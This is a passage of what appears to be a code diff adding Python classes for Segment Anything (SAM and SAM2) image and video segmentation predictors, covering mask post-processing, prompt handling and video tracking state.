torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. + + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. + + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. + prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. + + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (List, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is defined but not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (np.ndarray): The output masks in shape CxHxW, where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts (points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. + is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. + run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temprary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. + """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. + + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new 